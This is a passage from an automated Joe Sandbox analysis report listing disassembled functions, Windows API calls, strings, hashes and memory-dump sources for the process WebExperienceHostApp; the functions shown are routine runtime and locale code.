Instruction Fuzzy Hash: 3C612622B15E0289EF10DFA6D9510AC27B0BB8DFACB585836DE0E97B59CF38D561C350

Function 00007FF61949251C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF619493238: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF6194926C9), ref: 00007FF619493252

InterlockedPushEntrySList.API-MS-WIN-CORE-INTERLOCKED-L1-1-0 ref: 00007FF61949260D

Strings

Windows.Foundation.Uri, xrefs: 00007FF61949254B

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: EntryInterlockedListPushabort
String ID: Windows.Foundation.Uri
API String ID: 1923770069-1377045113
Opcode ID: 33188ad3fb2252c7f0eb815770db843d7374c1caf147856433e6f14bfcdb147e
Instruction ID: 2fddd1d71510e586a3e6aa8a9607624aee22050f20a331dd04effdb0a61384a3
Opcode Fuzzy Hash: 33188ad3fb2252c7f0eb815770db843d7374c1caf147856433e6f14bfcdb147e
Instruction Fuzzy Hash: 63413B22A09E06E9EB14DF60D9503F92361FB0CBACF804436DA0D87A59EF3CE524C380

Function 00007FFE007B2100 Relevance: 3.0, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007B2114

Part of subcall function 00007FFE007A4D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D32
Part of subcall function 00007FFE007A4D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D58
Part of subcall function 00007FFE007A4D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D70

setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007B213E

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: setlocale$freemallocmemcpy
String ID:
API String ID: 1663771476-0
Opcode ID: 8737389535b3fe6aa3b246914114041b48a8b76be02f41534b42691da87bcca8
Instruction ID: d088295720c64a42fd996dc178d509f219e6f0708abe43b50ee34cee5e4815da
Opcode Fuzzy Hash: 8737389535b3fe6aa3b246914114041b48a8b76be02f41534b42691da87bcca8
Instruction Fuzzy Hash: 7AF05422B0AA4652EF09AB66E5451B5A361AF447C4B5C8439DF0E4B779FE3CE095C300

Function 00007FFE007A3930 Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE007D8040: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FFE007A3832,?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,?), ref: 00007FFE007D804F

std::_Facet_Register.LIBCPMT ref: 00007FFE007A3A0B

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Facet_Register_lock_localesstd::_
String ID:
API String ID: 3986400115-0
Opcode ID: 9c1b0536e791d20bf9ccb3a21b4d26e33d38cb7de666908c62162abcb65010a3
Instruction ID: 1661879f5dfa969adecd27fafbaaa36f0ada0d364d9eaed288092bac16c5c932
Opcode Fuzzy Hash: 9c1b0536e791d20bf9ccb3a21b4d26e33d38cb7de666908c62162abcb65010a3
Instruction Fuzzy Hash: 9131AD22A4AA4284EA05AF25E4406B96360FB95BA4F5C4232FF5D073FDDF7CE582C310

Function 00007FF61949480C Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6194948A7

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: AcquireExclusiveLock
String ID:
API String ID: 4021432409-0
Opcode ID: f9d6cbe01079829e05a430424aa4c4ad0151c1e49743e8a65c4ac967d15e688f
Instruction ID: 696ce7462f20f4ad8d171b2712063f6cfe5f2488fbf72d6202e3e2f42ca3e670
Opcode Fuzzy Hash: f9d6cbe01079829e05a430424aa4c4ad0151c1e49743e8a65c4ac967d15e688f
Instruction Fuzzy Hash: 79218D25A18D9296FB20DF21EA5437A6360AF9CFBCF440239D91C86AE5CF2CF564C700

Non-executed Functions

Function 00007FFE007DC0E8 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 224COMMON

Download Yara Rule

APIs

iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DC15C
iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DC189
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007DC193
btowc.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFE007DC19F
iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DC1CB
iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DC1F9
iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DC30D
iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DC336

Strings

0, xrefs: 00007FFE007DC1C2
0, xrefs: 00007FFE007DC1B2

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: iswdigit$btowclocaleconv
String ID: 0$0
API String ID: 240710166-203156872
Opcode ID: f25cfa4c62369a9808755e00a142ea6129f249c9ed0bca85ae697669705b357f
Instruction ID: 359d7739fd6d0963862dfb79e0fec9c738c78154efbf713d5c48d68c15d5d5de
Opcode Fuzzy Hash: f25cfa4c62369a9808755e00a142ea6129f249c9ed0bca85ae697669705b357f
Instruction Fuzzy Hash: 66812573A1A55786E722AF25D85027A73B2FF90B44F4C4136DFCA463A9EB3CE855C600

Function 00007FFE007DAD0C Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 247COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140_APP ref: 00007FFE007DAD8E
memchr.VCRUNTIME140_APP ref: 00007FFE007DADD9
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007DADF2
memchr.VCRUNTIME140_APP ref: 00007FFE007DAE2D
memchr.VCRUNTIME140_APP ref: 00007FFE007DAE75
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DAF8C
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DAFB4

Strings

0, xrefs: 00007FFE007DAE1C
0123456789abcdefABCDEF, xrefs: 00007FFE007DAD7B, 00007FFE007DAD9E, 00007FFE007DADE8, 00007FFE007DAE3A

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: memchr$isdigit$localeconv
String ID: 0$0123456789abcdefABCDEF
API String ID: 1981154758-1185640306
Opcode ID: 47080461fdb72a4bc559756aa2ea0f6e1f8a764b3b904aecea474129a19d88a8
Instruction ID: 90baca254c409f22194ddcf4d503232b493433f28e6695e57db8fea9207becc4
Opcode Fuzzy Hash: 47080461fdb72a4bc559756aa2ea0f6e1f8a764b3b904aecea474129a19d88a8
Instruction Fuzzy Hash: E3916A62A0959656E721AB20D81037A7BA1FB44B48F4C9032DFCE437ADDB3CE906C742

Function 00007FFE007DC7E0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 239COMMON

Download Yara Rule

APIs

localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007DC87E
iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DCA64
iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DCA8D

Strings

0, xrefs: 00007FFE007DC848
0, xrefs: 00007FFE007DC8AE
0123456789abcdefABCDEF, xrefs: 00007FFE007DC851, 00007FFE007DC8B4

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: iswdigit$localeconv
String ID: 0$0$0123456789abcdefABCDEF
API String ID: 2634821343-613610638
Opcode ID: 49174df5c4cdc396e0c5235f3f105a11f693802dc7eaefa8f2b40817c63aabed
Instruction ID: 5ce1b5b84e2a4d351cd0241ba62f8c118d518aad49ba91272d6e8971e81625f4
Opcode Fuzzy Hash: 49174df5c4cdc396e0c5235f3f105a11f693802dc7eaefa8f2b40817c63aabed
Instruction Fuzzy Hash: 47812562E0A65746EB22AF24D81167976B1FB94B44F0C8032DFCE577A8EB3CE851D740

Function 00007FFE007AA230 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007A9DEC: memcpy.VCRUNTIME140_APP ref: 00007FFE007A9E3A

FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFE007AA2C6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007AA38A

Part of subcall function 00007FFE007A9D70: memcpy.VCRUNTIME140_APP ref: 00007FFE007A9DB1

FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFE007AA317
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007AA32C

Strings

., xrefs: 00007FFE007AA2E4
., xrefs: 00007FFE007AA2F3

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Findmemcpy$CloseFileFirst_invalid_parameter_noinfo_noreturnwcscpy_s
String ID: .$.
API String ID: 2624417167-3769392785
Opcode ID: b54155074bf5bdd9a68a963a018a7fba49ecd6018a5380948614d025b80af060
Instruction ID: 54e23da99a284813030a43a50d5a83e38405e80996080ad348e10ec66485bc43
Opcode Fuzzy Hash: b54155074bf5bdd9a68a963a018a7fba49ecd6018a5380948614d025b80af060
Instruction Fuzzy Hash: E2419322A1968196EE20EF65E8547B97360FB857A4F484231FBAD037E8DF7CD584C701

Function 00007FFE007B9C50 Relevance: 7.8, APIs: 5, Instructions: 324stringCOMMON

Download Yara Rule

APIs

strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007B9CEE
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007B9D01
strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007B9D16
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007BA074
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007BA0C2

Part of subcall function 00007FFE007CF6C4: memcpy.VCRUNTIME140_APP(?,?,?,?,?,00007FFE007B9A2E), ref: 00007FFE007CF728

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnstrcspn$localeconvmemcpy
String ID:
API String ID: 2354928869-0
Opcode ID: 243aefc0258b0b269433c76fd2b4b90c39a714807ae03ccb53dd7d940baafd4e
Instruction ID: c0d8ee56b0bdcc6ff68fc30afff04de709353174bb99f526f90b6223370bc8dd
Opcode Fuzzy Hash: 243aefc0258b0b269433c76fd2b4b90c39a714807ae03ccb53dd7d940baafd4e
Instruction Fuzzy Hash: 7EE16D22B0AB4599EB10EB65D4406AC7372FB48B98B594136DF5D67BA8DF3CD44AC300

Function 00007FFE007B97A0 Relevance: 7.8, APIs: 5, Instructions: 324stringCOMMON

Download Yara Rule

APIs

strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007B983E
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007B9851
strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007B9866
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007B9BC4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007B9C12

Part of subcall function 00007FFE007CF6C4: memcpy.VCRUNTIME140_APP(?,?,?,?,?,00007FFE007B9A2E), ref: 00007FFE007CF728

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnstrcspn$localeconvmemcpy
String ID:
API String ID: 2354928869-0
Opcode ID: 9a6a9a5831d60da9de16aa5e4a4b682bd4daa7348588c6784df99043229ce472
Instruction ID: 275f2aaadda12db5c1bf66916f15d48a2126e8de472c09c33ed762079f672ab1
Opcode Fuzzy Hash: 9a6a9a5831d60da9de16aa5e4a4b682bd4daa7348588c6784df99043229ce472
Instruction Fuzzy Hash: 9EE16D62B0AB8599FB00EB65D4402AC7372FB48B98B594136DF5D27BA8DF3CD44AC300

Function 00007FF619496CB0 Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF619496878,?,?,?,00007FF6194967A6), ref: 00007FF619496CE7
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF619496878,?,?,?,00007FF6194967A6), ref: 00007FF619496CF5
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF619496878,?,?,?,00007FF6194967A6), ref: 00007FF619496D13
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF619496878,?,?,?,00007FF6194967A6), ref: 00007FF619496D21

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 0056834fd57f5863927073a6cb3a8cdd4485bbb69fd36fa37474e5618a9aa299
Instruction ID: 678ce44cd03ca16bc13bdb31baa3b8e8b55ce419670f1cf81cbf74e2b21cbeb4
Opcode Fuzzy Hash: 0056834fd57f5863927073a6cb3a8cdd4485bbb69fd36fa37474e5618a9aa299
Instruction Fuzzy Hash: 79016DB2A04F4186EB109F52F6450A97761FB4CBA4B184031DF4D53725DF38E5A6C340

Function 00007FF6194940E0 Relevance: 4.7, APIs: 3, Instructions: 208threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6194941FD
IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00007FF619494328
OutputDebugStringW.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00007FF61949439E

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: CurrentDebugDebuggerOutputPresentStringThread
String ID:
API String ID: 4268342597-0
Opcode ID: b37a80acf4bc01ee0b7c53ce3a5b8644b15933e38540d10309bab3a19def6f90
Instruction ID: 642b7e4e03e6293bac2aac5d58911c1eace7683a91cc4fd5509a2870b29cf343
Opcode Fuzzy Hash: b37a80acf4bc01ee0b7c53ce3a5b8644b15933e38540d10309bab3a19def6f90
Instruction Fuzzy Hash: 79911922A08B9685EB759F25E64433977A0BF8DFACF088539DA4D86795DF3CE460C700

Function 00007FFE007AA690 Relevance: 3.1, APIs: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007A9DEC: memcpy.VCRUNTIME140_APP ref: 00007FFE007A9E3A

GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFE007AA775
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007AA7DF

Part of subcall function 00007FFE007A9B28: memcpy.VCRUNTIME140_APP ref: 00007FFE007A9C07

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpy$DiskFreeSpace_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3001910822-0
Opcode ID: f83b6692a73cea2080cbce9cadfd327f0b4a4e597a4eabc9e5dd105b028ec53d
Instruction ID: 30bcd20cf10fbfecb22f179ed9feda52035459332fb56612715a8460de0ca234
Opcode Fuzzy Hash: f83b6692a73cea2080cbce9cadfd327f0b4a4e597a4eabc9e5dd105b028ec53d
Instruction Fuzzy Hash: 18415832B05B4198EB00DBA1D8406ED37B5BB89BA8F585626DF5D23BACDF38D195C340

Function 00007FFE007CFAE0 Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007CFAE9
GetLocaleInfoEx.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFE007CFB02

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: InfoLocale___lc_locale_name_func
String ID:
API String ID: 3366915261-0
Opcode ID: 3aefda838095f36d881641da190c0c7e9a60875fb69119685df66e715777b3d5
Instruction ID: 74710bd956086c35ddde46f570266a007acb95da40f1b746b8350f3bcae33efe
Opcode Fuzzy Hash: 3aefda838095f36d881641da190c0c7e9a60875fb69119685df66e715777b3d5
Instruction Fuzzy Hash: 21F012B6D2E58282E3D46F25D865B792361FB44705F580139E70F427B8CF5CD9468741

Function 00007FFE1A458918 Relevance: 54.6, APIs: 3, Strings: 28, Instructions: 354COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458E23
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458E5B
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458E95

Strings

wchar_t, xrefs: 00007FFE1A458D8E
__w64 , xrefs: 00007FFE1A458B30
int, xrefs: 00007FFE1A4589C7
__int16, xrefs: 00007FFE1A458B12
__int128, xrefs: 00007FFE1A458BAC
char, xrefs: 00007FFE1A4589EB
auto, xrefs: 00007FFE1A458C2B
char16_t, xrefs: 00007FFE1A458D51
const, xrefs: 00007FFE1A458CC9
bool, xrefs: 00007FFE1A458D42
__int8, xrefs: 00007FFE1A458B24
<unknown>, xrefs: 00007FFE1A458C0A
unsigned , xrefs: 00007FFE1A458DE0
UNKNOWN, xrefs: 00007FFE1A458D76
short, xrefs: 00007FFE1A4589D9
char8_t, xrefs: 00007FFE1A458C19
__int32, xrefs: 00007FFE1A458BCA
signed , xrefs: 00007FFE1A458DF0
__int64, xrefs: 00007FFE1A458BBB
void, xrefs: 00007FFE1A458A7F
double, xrefs: 00007FFE1A458A41
float, xrefs: 00007FFE1A458A6D
long , xrefs: 00007FFE1A458A2A
volatile, xrefs: 00007FFE1A458CE4
decltype(auto), xrefs: 00007FFE1A458DAC
char32_t, xrefs: 00007FFE1A458D9D
volatile, xrefs: 00007FFE1A458D11
long, xrefs: 00007FFE1A4589B5

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
API String ID: 2943138195-1388207849
Opcode ID: 37cd17523382c81690176946402e2147554894c591ccd7ecb33aaa85e6f6bad3
Instruction ID: e7f851688d4782765672e6b50e5580de553b544a00352d504444ca7938b67704
Opcode Fuzzy Hash: 37cd17523382c81690176946402e2147554894c591ccd7ecb33aaa85e6f6bad3
Instruction Fuzzy Hash: 62F19FB2F08E1294FB56AB66D4502BC26F0BB11B64F4045F7CA0D16AB8DF7CE528E740

Function 00007FF619493AE0 Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 170windowthreadCOMMON

Download Yara Rule

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF619493C0B
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF619493C8C

Strings

ReturnNt, xrefs: 00007FF619493B9D
%hs(%u)\%hs!%p: , xrefs: 00007FF619493C40
ReturnHr, xrefs: 00007FF619493B96
